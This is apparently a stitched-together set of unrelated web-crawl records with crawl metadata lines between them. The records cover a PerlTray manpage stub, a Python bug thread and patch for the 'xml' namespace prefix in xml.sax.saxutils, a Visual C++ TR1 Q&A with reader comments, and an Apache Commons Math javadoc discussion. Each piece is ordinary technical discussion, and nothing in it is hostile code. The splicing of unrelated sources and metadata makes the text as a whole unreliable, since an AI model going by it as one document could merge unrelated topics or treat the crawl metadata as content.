Kit. More information available at This manpage documents PerlTray version 9.5.0 (build 300008)
http://docs.activestate.com/pdk/9.5/PerlTray.html
CC-MAIN-2017-39
refinedweb
2,489
56.25
Created on 2009-01-21 20:59 by roug, last changed 2010-10-27 18:52 by pitrou. This issue is now closed. The 'xml' namespace in XML files is special in that it need not be declared. When xml.sax.saxutils.XMLGenerator is used with the namespace feature it does not know how to handle it. Example. The code: import xml.sax, xml.sax.saxutils parser = xml.sax.make_parser() parser.setFeature(xml.sax.handler.feature_namespaces, 1) c = xml.sax.saxutils.XMLGenerator() parser.setContentHandler(c) parser.parse('testfile.xml') executed on the testfile.xml with this content: <?xml version="1.0"?> <a:greetings xmlns: <a:greet xml:Hello world</a:greet> </a:greetings> will produce this error: ... File "/usr/lib/python2.5/xml/sax/saxutils.py", line 149, in startElementNS self._write(' %s=%s' % (self._qname(name), quoteattr(value))) File "/usr/lib/python2.5/xml/sax/saxutils.py", line 107, in _qname prefix = self._current_context[name[0]] KeyError: u'' It can be fixed by making an exception for the xml namespace (as required by W3C - See) in xml/sax/saxutils.py. The _qname method could then look like this: def _qname(self, name): """Builds a qualified name from a (ns_url, localname) pair""" if name[0]: if name[0] == u'': return u'xml' + ":" + name[1] # The name is in a non-empty namespace prefix = self._current_context[name[0]] if prefix: # If it is not the default namespace, prepend the prefix return prefix + ":" + name[1] # Return the unqualified name return name[1] I've duplicated the issue and the fix using Python 2.6.2. I'm attaching Soren Roug's fix in patch form. (I created the patch against r53754 of saxutils.py.) Can you add a unittest, based on the example, that fails before and passes after the patch? Assuming this applies to Py3, make patch against py3k branch (or at least 3.2a1 release), which is now 'trunk'. That aside, the patch is a simple 2-line addition. I've attached a patch against branches/py3k that tests and fixes the issue. I don't suppose this fix (if I backport it) could make it into 2.6.6, could it? I've created tests and patches for the trunk and branches/py3k. The only difference between the two is the use of u'' for a Unicode string in the trunk. (IIRC, Py3k treats all strings as Unicode.) It is about a week too late for 2.6.6. rc1 is just out and only critically needed fixes before the final. For future reference, 'trunk' is frozen. 2.7 patches should be against '2.7maintenace' (or however spelled) but I assume this should apply. 'py3k' is the defacto development trunk. I am not sure what will happen after the switch to hg. Given that you both agree on the fix, I suspect that this is ready for commit review, but I cannot properly review it. I am trying to get information on who to add to nosy. I figured it was probably too late, but one can always hope. :) While you sort out who gets to review this, I'll see if I can't work out a patch for 2.7. It also occurred to me last night that I should probably add a comment to it. Look for new patches with a day. There are no specific maintainers for xml.sax.utils. As per RDM's suggestion, Fred or Martin, do either of you have any comments on this or who it might be referred to? I'm attaching new patches for 2.7 and 3.2, now with comments. :) Hi guys. I'd like to take a moment to remind everyone that this issue has a small patch with two tests and comments. Please don't let it get lost. :) Thanks, Troy According patch looks good to me. Committed in r85858 (3.2), r85859 (3.1) and r85860 (2.7). Thank you!
http://bugs.python.org/issue5027
CC-MAIN-2016-26
refinedweb
656
77.84
). 5. We're identifying bugs in TR1 and working with Dinkumware to fix them. Dinkumware's code was very solid to begin with - but as ever, more eyes find more bugs. I've even found a couple of bugs in the TR1 spec made them talk to each other in order to improve performance. For example, STL containers of TR1 types (e.g. vector<shared_ptr<T> >, vector<unordered_set<T> >) will avoid copying their elements, just as STL containers of STL containers in VC8 and VC9 avoid copying their elements. PingBack from Great stuff! Thanks for the detailed rundown. Looking forward to using it! Looks nice, but where do we submit TR1 bugs? If TR1 is just a bunch of headers and maybe some link libraries, and if there are no compiler changes, then why would TR1 not run on VCExpress? With a little bit of manual work, I imagine that it would not be too difficult to get up and running. Is this merely a business decision, or is there actually a technical reason for this restriction? Why you may ask? I have access to the full version, but I honestly prefer to work in Express. Express removes so much of the unneeded bloat, is faster, and as a result more productive. Similar to the days of VC6. [Cory Nelson] > Looks nice, but where do we submit TR1 bugs? Microsoft Connect, or directly to me at stl@microsoft.com . Stephan T. Lavavej Visual C++ Libraries Developer Stephan T. Lavavej, Pretty cool initials you have there. Seems ideal for someone who loves the STL so much. James, Thats a really great idea: use VCExpress to avoid the bloated VS. Is there an official method for paying customers to use (leverage) VCExpress with MFC and TR1. I also find VS has become very bloated since VC6. Overall, I think the VC++ team is doing a good job, but much of Visual Studio does not appeal to me. Speaking of STL optimizations: is there any specific reason (aside from the "we haven't time to do that") why std::vector doesn't use __is_pod and friends to switch to a memset/memcpy-using implementation where possible? In my tests, this gives noticeable speed increase for small elements - it's more than 2x for chars, and 20% for shorts. Dinkumware has implemented nearly everything in sections 5.2 and 8. Since MS is licensing Dinkumware's implementation, is there a good reason VC9 TR1 does not include sections 5.2 and 8? [Anon.] > Pretty cool initials you have there. Seems ideal for someone who loves the STL so much. Yes (and my initials are so much more convenient to type)! [Jared] > Is there an official method for paying customers to use (leverage) VCExpress with MFC and TR1. No, this is not supported. [Pavel Minaev] > Speaking of STL optimizations: is there any specific reason > (aside from the "we haven't time to do that") why std::vector > doesn't use __is_pod and friends to switch to a > memset/memcpy-using implementation where possible? I thought it did - vector<T>::push_back() eventually calls vector<T>::_Insert_n(), which (should) call _Umove() to move elements from the old memory block to the new memory block. (As I mentioned in , this is broken in the VC9 TR1 Beta.) That eventually calls _Uninit_move(), which - if T is something like char which isn't annotated with _Swap_move_tag - calls unchecked_uninitialized_copy() ("move defaults to copy if there is not a more effecient way"). That eventually calls _Uninit_copy(), of which there are two implementations. The first is for _Nonscalar_ptr_iterator_tag, and the second is for _Scalar_ptr_iterator_tag. The latter calls _CRT_SECURE_MEMMOVE(). Did you define __STDC_WANT_SECURE_LIB__ to 0 when doing your performance comparisons? If not, you might just be seeing the overhead of memmove_s() versus memmove(). Of course, now I wonder if memcpy() is actually faster, and whether we should be using _CRT_SECURE_MEMCPY(). [Kevin] > Dinkumware has implemented nearly everything in > sections 5.2 and 8. Since MS is licensing > Dinkumware's implementation, is there a good reason > VC9 TR1 does not include sections 5.2 and 8? Development time, testing time, and customer value. Shipping C99 compat and special math functions would take more dev and test time (probably not an incredible amount of time, but definitely nonzero). The special math functions are of extremely limited interest (and have not been picked up into C++0x), and the C99 compat, while useful, is of less interest than the Boost-derived components. (I'd like to have <cstdint>, but shared_ptr is about a bazillion times more vital.) So, given limited resources, we chose the Boost-derived components and unordered containers. Does that sound reasonable? > Of course, now I wonder if memcpy() is actually faster, and whether we should be using _CRT_SECURE_MEMCPY(). Not really, since memmove() in VC checks the ranges for overlap, and delegates to memcpy() if possible anyway. My tests show no noticeable difference for non-overlapping sequences between the two even for amount of data as small as 4K. Not a problem with memmove_s(), either - it also does a very quick check with no observable difference for moderately large vectors. I was also thinking that the difference is because I used memset to zero-initialize my arrays, and vector uses std::fill (it could also use memset to default-initialize PODs, by the way), but again it doesn't seem to make any difference. So I don't know what to make of it. Here's the code I've used to test: #include <algorithm> #include <cstdio> #include <cstring> #include <vector> #include <windows.h> struct timer { const char* msg; DWORD start; timer(const char* msg) : msg(msg), start(GetTickCount()) { } ~timer() DWORD end = GetTickCount(); std::fprintf(stderr, "%s: %u\n", msg, end - start); }; int main() typedef char elem_t; static const int N = 100000, K = 10000; //getchar(); timer t("vector"); for (int k = 0; k < K; ++k) { std::vector<elem_t> v(N); v.push_back(0); } timer t("fill + memmove"); elem_t* a1 = new elem_t[N]; std::fill(a1, a1 + N, 0); elem_t* a2 = new elem_t[N * 2]; std::memmove(a2, a1, N * sizeof(elem_t)); delete[] a1; a2[N] = 0; delete[] a2; timer t("fill + memcpy"); std::memcpy(a2, a1, N * sizeof(elem_t)); timer t("memset + memcpy"); std::memset(a1, 0, N * sizeof(elem_t)); } This is compiled with: > cl /EHsc /Ox /Zi /D_SECURE_SCL=0 /D__STDC_WANT_SECURE_LIB__=0 When run, it gives the following results: vector: 1344 fill + memmove: 422 fill + memcpy: 422 memset + memcpy: 437 From what you say, I would expect vector to be as fast as fill+memmove (since that's pretty much what it does). Curiously, these numbers differ with varying K and N; in general, smaller N make the difference more pronounced, while larger N make it less noticeable. For example, for N=10000 & K=1000000 I get: vector: 11391 fill + memmove: 2343 fill + memcpy: 2313 memset + memcpy: 2328 And for N=1000000 & K=1000, it's: vector: 5000 fill + memmove: 4938 fill + memcpy: 4937 memset + memcpy: 4938 Which makes more sense. I'm more interested in cases with N<100000, since that's where it is going to be in most practical cases. From these numbers, it seems that the issue is not in the filling/copying code itself, but in some checks which remain there even with _SECURE_SCL disabled. > I'd like to have <cstdint>, but shared_ptr is about a bazillion times more vital. <cstdint> is by far the most important of all TR1 compat headers, and also the simplest; why not have it and forgo the rest? I'm disappointed at stdint/cstdint being missing, too. I hate typing unsigned __int64 in one-off programs and I've never seen a major project that didn't have to have its own typedefs for sized types. Lots of fun when they collide. Much of the stuff in TR1 section 8 I could do without, but stdint.h I want. I suppose not having the extra printf() size specifiers would be a bummer, though. Well, for most practical purposes, we've got a defacto standard by now: sizeof(short)==2 sizeof(int)==4 sizeof(long long)==8 At least I'm not aware of any still-relevant compiler for which this doesn't hold (I know int was 2 bytes in 16-bit DOS days, but these are hardly relevant today). Even so, int32_t is so much more preferrable... Aha - it's good to know that memmove_s(), memmove(), and memcpy() are basically indistinguishable, and the same for fill() and memset(). Thanks for the test case - profiling indicates that the vector test spends 76% of its time in vector<T>::_Construct_n(). I'll file a bug. > <cstdint> is by far the most important of all TR1 compat headers, > and also the simplest; why not have it and forgo the rest? The "which parts of TR1 should we ship" decision was made at the coarsest-grained level of Boost/C99/Math. [Phaeron] > I'm disappointed at stdint/cstdint being missing, too. There's always boost/cstdint.hpp. > I hate typing unsigned __int64 in one-off programs VC accepts "unsigned long long". > and I've never seen a major project that didn't have to have > its own typedefs for sized types. Lots of fun when they collide. Namespaces!). > At least I'm not aware of any still-relevant compiler for which this doesn't hold "ILP64" platforms make int, long, long long, and void * all 64 bits. I'm not sure which platforms actually implement ILP64. > There's always boost/cstdint.hpp. I tend to compile lots of little test programs with cl.exe for which bringing in Boost is, um, a bit much. > VC accepts "unsigned long long". That's even longer! >). You're welcome. You can probably imagine my amusement, though, that a developer on the VC++ Libraries team used reverse-engineered docs from an external source for the VC++ debugger. Go bug the debugger team and ask them to write better docs! Then tell them to release them to us. :) > I've written visualizers for almost every TR1 type (I am secretly proud of how shared_ptr's visualizer switches between "1 strong ref" and "2 strong refs"). How about boost::function? ;) > I tend to compile lots of little test programs with cl.exe for which bringing in Boost is, um, a bit much. At home, I drop Boost into VC\PlatformSDK\Include and VC\PlatformSDK\Lib, so I can use it without any /I switches. (I could also have used VC\include and VC\lib .) This is, of course, entirely unsupported - as a general rule you shouldn't perform brain surgery in Program Files - but it works entirely well. >> VC accepts "unsigned long long". > That's even longer! The typedefs I use at home are uc_t, us_t, ul_t, and ull_t. :-) > You're welcome. You can probably imagine my amusement, though, > that a developer on the VC++ Libraries team used reverse-engineered > docs from an external source for the VC++ debugger. The sad thing is that - to my knowledge - your docs are the most complete ones in existence. We don't have *any* internal docs for the visualizer, beyond the comments in autoexp.dat. > How about boost::function? ;) I visualize tr1::function too; however, pointers-to-bases are a "brick wall" to visualizers, so I can only preview them with "empty" or "full". Vaguely speaking, _Impl->_Callee._Object stores the functor, but there's no way to get that into the preview. For the same reason, shared_ptr deleters are not visualizable. When this happens, I provide [actual members] so you can dig into the representation; the foo,! trick isn't widely known, and is less convenient anyways. Yesterday, I checked in an enhanced regex visualizer. While basic_regex looks like it stores a plain string, it actually stores a finite state machine, which is completely un-visualizable. So, I added a data member named _Visualization to basic_regex that stores the string from which it was constructed, which we can use to preview the regex. By default, this is enabled in debug and disabled in ship (we'll fall back to a significantly less useful preview), although you can override this by defining _ENHANCED_REGEX_VISUALIZER (0 in debug would remove the overhead of storing the string; 1 in ship would make debugging easier). While basic_regex is much more heavyweight than a simple string, I didn't want to make ship any slower without people asking for it. Hopefully, you will be pleasantly surprised by the number of TR1 types that I visualize, and the comprehensiveness of their visualizers. weak_ptrs can be previewed with "expired", regex_iterators and regex_token_iterators have useful previews and children, and even the return value of bind() will be visualized (this hasn't been checked in yet, pending a bind() fix, but STL functors like plus<T>() and the like will also get visualizers, since that makes bind() visualizers much prettier). I am also disappointed to not see stdint. Having to make typedefs in portable code gets old quick. stdint and inttypes are both very simple, is there no way for them to be included? Agreed. cstdint is necessary, not to mention ridiculously easy to implement. There's no excuse not to ship a standard header file which consists of nothing but a small set of extremely useful typedefs. Since we are talking about Visualizers, does anyone else have this problem - on Vista w/ VC2005 SP1 (w/ vista update), no [Visualizer]s seem to work at all. My [AutoExpands] work properly, but I cannot even get STL container of ints to visualize as you would expect (e.g. I get {_Myfirst=0x003d4ea0 _Mylast=0x003d4eb4 _Myend=0x003d4eb8 } instead of {[2](x,y)}. Btw, this is on Visual Studio 2005 Standard, though I can't see why that would make a difference. > I visualize tr1::function too; however, pointers-to-bases are a "brick wall" to visualizers, so I can only preview them with "empty" or "full". Vaguely speaking, _Impl->_Callee._Object stores the functor, but there's no way to get that into the preview.). > I am also disappointed to not see stdint. I'd like to have cstdint in VC9 TR1 too, but remember the opportunity cost. If we had an extra day, week, or month to work on TR1, I'd want us and Dinkumware to look at regex perf. [mochi] > on Vista w/ VC2005 SP1 (w/ vista update), no [Visualizer]s seem to work at all. On my dev box (Server 2003 SP2 with VC8 SP1 Team Suite), visualizers work intermittently, which mystifies me. I had installed and uninstalled another edition of VC8 before, but hadn't done anything else unusual to that computer. (I'm 90% sure that my ordinary development work doesn't interact with the regular installation.) I really ought to nuke and pave that machine, but I'm waiting to get a quad-core. >). Function pointers, okay - given a tr1::function<FT>, if it holds a function pointer, that's of type FT *. That's a good idea. But bind expressions, no - the type of a bind expression is highly variable, depending on more than its signature. regex's representation was almost completely opaque (except for the flags with which it was constructed), so the enhanced regex visualizer is rather valuable. I could imagine it being hard to track down the string from which a regex was constructed (especially in the case of constructing a regex from input iterators), even though the usual case is to have a const regex constructed from a string literal. tr1::function's representation, on the other hand, is obnoxious to pick through the first time, but does contain all of the information you want. So the need for an enhanced visualizer is less (although it sure would be convenient). I'll take a look at how simple it would be to add a "stores a function pointer" bool to tr1::function, although I suspect that it would require adding some overloads. Anything that could destabilize the implementation would be Bad. (regex's _Visualization didn't need any new overloads, so there was no danger of breaking something else. At worst, we'd forget to update the _Visualization when we should.) Visual C++ Team Blog : MFC Beta Now Available Download details VC++ 2008 Libraries Feature Pack Beta Can we use MFC/TR1 for native/win32 programming and not MFC? [Dave] > Can we use MFC/TR1 for native/win32 programming and not MFC? I don't understand your question, can you clarify it? Hey - everyone who says Microsoft needs to provide stdint.h. There's a public domain version available (from the MinGW toolset): It required some tweaks for my use (to make the 64-bit stuff work with VC6 - I don't remember if changes were needed for any other MS compiler version). I know that MS should provide this with the compiler (and I sure have no idea why they don't), but until they decide to you can have your portability in this small area with little in the way of maintainability headaches since it's not interdependent on other bits of the library - it's just a bunch of typedefs and macros. - I mean, Is TR1 an specific feature for MFC users? if not , why did you distribute it along with MFC update? - after compiling with this new patch ,is distribution of updated CRT enough ? No new libraries needed to distribute? Thanks in advance > Soma annonce sur son blog le support du TR1 dans Visual Studio 2008 . Vous pouvez télécharger la béta >. You are right about my first question ("the beta reference_wrapper..."). I didn't investigate deep enough. I jumped to conclusion too fast when I saw this error: 1>c:\users\hzhang\documents\visual studio 2008\projects\test\test.cpp(35) : error C2582: 'operator =' function is unavailable in 'std::tr1::reference_wrapper<_Ty>' Even though I cannot find a definition of 'operator =' in the source, I could assume that the trivial copy assignment operator bit-copies the internal pointer-to-type. Thank you. This stuff is awesome, and really the only reason I want to upgrade to VC9 (a real, working, debuggable, shared_ptr class without having to install the giant mess that is boost) Having said that, something still puzzles me: void f(){cout<<"f"<<endl;} void g(){cout<<"g"<<endl;} typedef int*const cpi; typedef void (*const cpf)(); { int a = 100, b=120; cpi cpia = &a; cpi cpib = &b; cpf cpf1 = & f; cpf cpf2 = & g; //cpia = cpib;//can't do this, we already know //cpf1 = cpf2;//can't do this either, we all know reference_wrapper<cpi> ra(cpia), rb(cpib); reference_wrapper<cpf> rf(cpf1), rg(cpf2); rf(); //rf = rg;//can we do this? the compiler won't *ra += 1; cout<<a<<" "; ra= rb;//we can do this, the compiler does it *ra += 2; cout<<b<<endl; Another bug, I'll file it. ProfilerOne of the new features in Visual Studio Team System (VS2008) is called Noise Reduction. This Hello, I'm a little late to the game, but does the feature pack contain new redist MSIs for the CRT dlls? - Kim Can these libraries be used with Smart Device (Windows Mobile) projects? during playing with the feature pack I found a performance characteristic that looks strange to me. A simple A*-example-App needs to test whether it has seen an unsigned long long before - any set-style class can handle that: std::set<unsigned long long> vals; ... while(...) unsigned long long val=... if(vals.insert(val).second) //not yet seen else //seen ... Since stdext::hash_set and std::tr1::unordered_set (and mingw gcc 3.4.5 __gnu_cxx::hash_set) share this interface I made a perf comparison (for the mingw I had to implement the hash-function) The results are strange (just used task manager to measure cpu-time): using std::set mingw and vs 2008 keep pace: vs: 36 sec mingw: 35 sec using __gnu_cxx::hash_set shows the expected drop in computing time: 28 sec but the 2 VS2008 hash sets use a lot more computing time than before which renders them rather useless: stdext::hash_set: 50 sec std::tr1::unordered_set: 53 sec is there a way to adress this? thanks gulli [Kim Gräsman] > I'm a little late to the game, but does the feature > pack contain new redist MSIs for the CRT dlls? Yes; otherwise, end users would be unable to run TR1-powered applications. VCRedist has also been updated (although VC recommends against its use). [mjf] > Can these libraries be used with Smart Device > (Windows Mobile) projects? Anything that can use VC9's STL can use TR1. [gulli] > flaw in hash_set and unordered_set performance I will investigate. I have filed a bug about our hash_set/unordered_set performance. (I also found an infinite loop bug in <random> while I was at it.) Hello Recently we shipped a beta of our MFC/TR1 Feature Pack that, naturally enough, included a large vc9 Feature Pack tr1 的一些问题 一、头文件包含的问题 二、regex memory leak.  Good news from the C++ Team!!   ================== The final release of the Visual C++ 2008 Feature During my Windows Development session at the Heroes Happen { 2008 } launch shows around the country,...
http://blogs.msdn.com/vcblog/archive/2008/01/08/q-a-on-our-tr1-implementation.aspx
crawl-002
refinedweb
3,521
63.09
According to the javadoc for java.util.Scanner.skip Skips input that matches the specified pattern, ignoring delimiters. import java.util.Scanner; public class Example { public static void main(String [] args) { Scanner sc = new Scanner("Hello World! Here 55"); String piece = sc.next(); sc.skip("World"); // Line A throws NoSuchElementException, vs. sc.skip("\\sWorld"); // Line B works! sc.findInLine("World"); // Line C works! } } You left out the next sentence of the method's description which reads (emphasis mine): This method will skip input if an anchored match of the specified pattern succeeds. So Scanner is not so much "ignoring" the delimiter, but simply trying to match the specified regular expression without taking the delimiter into account. In other words, the space before World is not treated as a delimiter by skip(), but merely part of the input that it is trying to match against.
https://codedump.io/share/AGN2WIkxsJrS/1/scannerskip-documentation-concerning-delimiters
CC-MAIN-2017-47
refinedweb
144
58.38
ffff AboutAbout ff is a tool for finding files in the filesystem. NOTE: ff is in the early stages of development, expect things to break and syntax to change. SummarySummary ff lets you find files in the filesystem by querying file metadata. Its scope is similar to find(1) and fd(1) but it tries to be more accessible and easier to use than find and and more versatile and powerful than fd. It is written in Python >= 3.6. FeaturesFeatures - Search by file attributes. - Search in a wide variety of file metadata. - Simple yet powerful expression syntax. - Flexible output options. - Flexible sort options. - Extendable by user plugins. - Parallel search and processing. - Usable in scripts with a Python API. ExamplesExamplesInstallation To build and install ff simply type: $ python setup.py install or $ pip install find-ff This installs the python sources, the ff script, the man page and a set of plugins. Python APIPython API You can use ff's query capabilities in your own scripts: from libff.search import Search for entry in Search("type=f git.tracked=yes", directories=["/home/user/project"], sort=["path"]): print(entry["relpath"]) Developing plugins and debug modeDeveloping plugins and debug mode There is a template for new plugins to start from ( plugin_template.py) with exhaustive instructions and comments, so you can develop plugins for your own needs. Useful in that regard is ff's debug mode. It can be activated by executing the libff module. $ python -m libff --debug info,cache ... Debug mode produces lots of messages which can be limited to certain categories using the --debug category1,category2,... option. On top of that, debug mode activates many internal checks using assert(). Therefore, it is advisable to use debug mode during plugin development.
https://libraries.io/pypi/find-ff
CC-MAIN-2020-24
refinedweb
290
60.51
Forgive my ignorance in electronics. I know (next to) nothing about all this. I have however altered some example code to do what I want it to do. It works great! This is a simple MIDI sketch that uses 5 buttons and a toggle switch to send program changes. When the toggle switch is enabled it changes what program changes are sent.Thus giving me 10 different program changes. I have the on-board led light turning on when I turn on the toggle switch letting me know I'm in the 2nd bank of programs. My question is, do I need some sort of resister when using a regular LED light? I have some left over LEDs from an Arduino UNO kit that I got about a year ago and never used. They have 2 long leads on them. One shorter than the other. Can I just connect the ground and pin 13 to the LED and make this work? I appreciate any help you can give this novice. I'm using a Teensy 3.2. Here is the code I've hobbled together. Thanks. /* Simple Teensy DIY USB-MIDI controller. Created by Liam Lacey, based on the Teensy USB-MIDI Buttons example code. Contains 8 push buttons for sending MIDI messages, and a toggle switch for setting whether the buttons send note messages or CC messages. The toggle switch is connected to input pin 0, and the push buttons are connected to input pins 1 - 8. You must select MIDI from the "Tools > USB Type" menu for this code to compile. To change the name of the USB-MIDI device, edit the STR_PRODUCT define in the /Applications/Arduino.app/Contents/Java/hardware/teensy/avr/cores/usb_midi/usb_private.h file. You may need to clear your computers cache of MIDI devices for the name change to be applied. See for the Teensy MIDI library documentation. */ //The number of push buttons. I've changed this to use just 5 buttons instead of 8. //Had to skip pins 2,4 and 6 due to poor soldering skills. lol. #include <Bounce.h> const int ledPin = 13; const int NUM_OF_BUTTONS = 8; const int MIDI_CHAN = 10; const int DEBOUNCE_TIME = 15; Bounce buttons[NUM_OF_BUTTONS + 1] = { Bounce (0, DEBOUNCE_TIME), Bounce (1, DEBOUNCE_TIME), Bounce (2, DEBOUNCE_TIME), Bounce (3, DEBOUNCE_TIME), Bounce (4, DEBOUNCE_TIME), Bounce (5, DEBOUNCE_TIME), Bounce (6, DEBOUNCE_TIME), Bounce (7, DEBOUNCE_TIME), Bounce (8, DEBOUNCE_TIME) }; const int MIDI_MODE_ONE = 0; const int MIDI_MODE_TWO = 1; //Variable that stores the current MIDI mode of the device (what type of messages the push buttons send). int midiMode = MIDI_MODE_ONE; //Arrays the store the exact note and CC messages each push button will send. const int MIDI_ONE_NUMS[NUM_OF_BUTTONS] = {11, 0, 12, 0, 13, 0, 14, 15}; const int MIDI_ONE_VALS[NUM_OF_BUTTONS] = {127, 127, 127, 127, 127, 127, 127, 127}; const int MIDI_TWO_NUMS[NUM_OF_BUTTONS] = {1, 0, 2, 0, 3, 0, 4, 5}; const int MIDI_TWO_VALS[NUM_OF_BUTTONS] = {127, 127, 127, 127, 127, 127, 127, 127}; //const int MIDI_NOTE_NUMS[NUM_OF_BUTTONS] = {10, 41, 42, 43, 36, 37, 38, 39}; //const int MIDI_NOTE_VELS[NUM_OF_BUTTONS] = {110, 110, 110, 110, 110, 110, 110, 110}; //const int MIDI_CC_NUMS[NUM_OF_BUTTONS] = {24, 25, 26, 27, 20, 21, 22, 23}; //const int MIDI_CC_VALS[NUM_OF_BUTTONS] = {127, 127, 127, 127, 127, 127, 127, 127}; //================================================== ============================ //================================================== ============================ //================================================== ============================ //The setup function. Called once when the Teensy is turned on or restarted void setup() { // Configure the pins for input mode with pullup resistors. // The buttons/switch connect from each pin to ground. When // the button is pressed/on, the pin reads LOW because the button // shorts it to ground. When released/off, the pin reads HIGH // because the pullup resistor connects to +5 volts inside // the chip.(ledPin, OUTPUT); for (int i = 0; i < NUM_OF_BUTTONS + 1; i++) { pinMode (i, INPUT_PULLUP); } } //================================================== ============================ //================================================== ============================ //================================================== ============================ //The loop function. Called over-and-over once the setup function has been called. void loop() { //================================================== ============================ // Update all the buttons/switch. There should not be any long // delays in loop(), so this runs repetitively at a rate // faster than the buttons could be pressed and released. for (int i = 0; i < NUM_OF_BUTTONS + 1; i++) { buttons[i].update(); } //================================================== ============================ // Check the status of each push button for (int i = 0; i < NUM_OF_BUTTONS; i++) { //======================================== // Check each button for "falling" edge. // Falling = high (not pressed - voltage from pullup resistor) to low (pressed - button connects pin to ground) if (buttons[i + 1].fallingEdge()) { if (midiMode == MIDI_MODE_ONE) usbMIDI.sendProgramChange (MIDI_ONE_NUMS[i], MIDI_CHAN, 0); //digitalWrite(ledPin, HIGH); // set the LED on //delay(1000); // wait for a second //} else usbMIDI.sendProgramChange (MIDI_TWO_NUMS[i], MIDI_CHAN, 0); } //======================================== // Check each button for "rising" edge // Rising = low (pressed - button connects pin to ground) to high (not pressed - voltage from pullup resistor) } //for (int i = 0; i < NUM_OF_BUTTONS; i++) //================================================== ============================ // Check the status of the toggle switch, and set the MIDI mode based on this. if (buttons[0].fallingEdge()) { midiMode = MIDI_MODE_ONE; digitalWrite(ledPin, HIGH); // set the LED on //delay(200); } else if (buttons[0].risingEdge()) { midiMode = MIDI_MODE_TWO; digitalWrite(ledPin, LOW); // set the LED off //delay(200); } //================================================== ============================ // MIDI Controllers should discard incoming MIDI messages. // while (usbMIDI.read()) { // ignoring incoming messages, so don't do anything here. } }
https://forum.pjrc.com/threads/62980-LED-light-on-pin-13?s=0c52b110a8a2dcfd4ffbaec1ae22661a&p=252301&mode=linear
CC-MAIN-2021-10
refinedweb
838
71.55
On 31 August 2012 16:51, Sébastien Brisard <sebastien.brisard@m4x.org> wrote: > Hi sebb, > > 2012/8/31 sebb <sebbaz@gmail.com>: >> On 31 August 2012 14:52, Sébastien Brisard <sebastien.brisard@m4x.org> wrote: >>> Hi Gilles, >>> >>> 2012/8/31 Gilles Sadowski <gilles@harfang.homelinux.org>: >>>> Hello Sébastien. >>>> >>>>> Author: celestin >>>>> Date: Fri Aug 31 03:12:16 2012 >>>>> New Revision: 1379270 >>>>> >>>>> URL: >>>>> Log: >>>>> MATH-849: changed boundary case x = 8.0 in double Gamma.logGamma(double). >>>>> >>>>> Modified: >>>>> commons/proper/math/trunk/src/main/java/org/apache/commons/math3/special/Gamma.java >>>>> >>>>> Modified: commons/proper/math/trunk/src/main/java/org/apache/commons/math3/special/Gamma.java >>>>> URL: >>>>> ============================================================================== >>>>> --- commons/proper/math/trunk/src/main/java/org/apache/commons/math3/special/Gamma.java (original) >>>>> +++ commons/proper/math/trunk/src/main/java/org/apache/commons/math3/special/Gamma.java Fri Aug 31 03:12:16 2012 >>>>> @@ -222,9 +222,9 @@ public class Gamma { >>>>> * Returns the value of log Γ(x) for x > 0. >>>>> * </p> >>>>> * <p> >>>>> - * For x < 8, the implementation is based on the double precision >>>>> + * For x ≤ 8, the implementation is based on the double precision >>>> >>>> My personal taste would be to write this as >>>> --- >>>> {@code x <= 8} >>>> --- >>>> [As I'm not an HTML parser, >>>> >>> I'm a bit disappointed by your poor parsing capabilities ;-) >>> >>>> it always takes me a few moments to figure out a >>>> sequence such as "x < 8", while it is easier to focus on the central part >>>> of "{@code x <= 8}".] >>>> >>>> So, if nobody disagrees, this could become a formatting rule. [The rationale >>>> (to be included in the document you proposed to create) would be that >>>> Javadoc comments should be as easy as possible to read in their source form, >>>> for the developer's sake.] >>>> >>> Yeah, and it gets worse when I had to find a work around for the >>> decimal point not being interpreted as the end of the first sentence: >>> I ended up with something like >>> Returns the value of 1 / Γ(1 + x) - 1 for -0.5 ≤ x ≤ >>> 1.5. In case you wondered, . is simply '.'. This is uggly, I >>> agree. >>> >>> I was thinking this very morning of something like "HTML tags are >>> allowed as long as reading the source file is still reasonably easy". >>> I'm quite happy with a more radical approach, like "HTML text >>> formatting tags should be avoided as much as possible. Paragraph >>> formatting (<p>, <li>, <pre>, ... is allowed)". Note that it has not >>> been applied consistently in CM yet : in some parts, formulae are >>> formatted with HTML tags, in other parts, it's pure {@code }. I >>> contributed to this mess :-( >>> As sebb mentions {@code } prevents *any* formatting, but this would >>> not really be an issue. If needed, we can use <pre></pre> tags and >>> nice text-based equations (again, tools like Maxima can help a lot), >>> even if it looks old fashioned. >>> >>> I'll write something up in the JIRA ticket, so that everyone can review it. >> >> Rather than formal rules, maybe it would be better to treat such >> formatting ideas as "best practice". >> > Yes, we do not want to frighten anyone. However, the aim of this > document is to pick the rules (whatever you call them) we feel are > REALLY important to improve the quality and consistency of the source. >> >> That is, provide examples of different ways to document certain tricky >> constructs. >> This should make it more obvious when to choose a particular method. >> And equally, it would show when there is no particular best choice. >> > Please have a look at MATH-852. I have already written one example for > another "rule". I agree with you: examples do help. > >> >> Such examples should prove useful across all Commons components. >> > One step at a time! I know it's going to be difficult to reach > consensus within CM. So maybe we should wait until our document is > fairly stable. Then we can submit it to anyone to discuss... That's my point about providing examples - there is no need to reach consensus. If the example works, use it; if not don't. > Sébastien > >>> Thanks for this suggestion, >>> >>> Sébastien >>>> >>>> Best regards, >>>> Gilles >>>> >>>>> * implementation in the <em>NSWC Library of Mathematics Subroutines</em>, >>>>> - * {@code DGAMLN}. For x ≥ 8, the implementation is based on >>>>> + * {@code DGAMLN}. For x > 8, the implementation is based on >>>>> * </p> >>>>> * <ul> >>>>> * <li><a href="">Gamma >>>>> @@ -249,7 +249,7 @@ public class Gamma { >>>>> return logGamma1p(x) - FastMath.log(x); >>>>> } else if (x <= 2.5) { >>>>> return logGamma1p((x - 0.5) - 0.5); >>>>> - } else if (x < 8.0) { >>>>> + } else if (x <= 8.0) { >>>>> final int n = (int) FastMath.floor(x - 1.5); >>>>> double prod = 1.0; >>>>> for (int i = 1; i <= n; i++) { >>>>> >>>>> >>>> >>>> --------------------------------------------------------------------- >>>>
http://mail-archives.apache.org/mod_mbox/commons-dev/201208.mbox/%3CCAOGo0VbNYGKQdVNigCBtgtTQVQmK0w+JnSQdMBE9y3Rnt-2P3g@mail.gmail.com%3E
CC-MAIN-2015-35
refinedweb
771
66.84
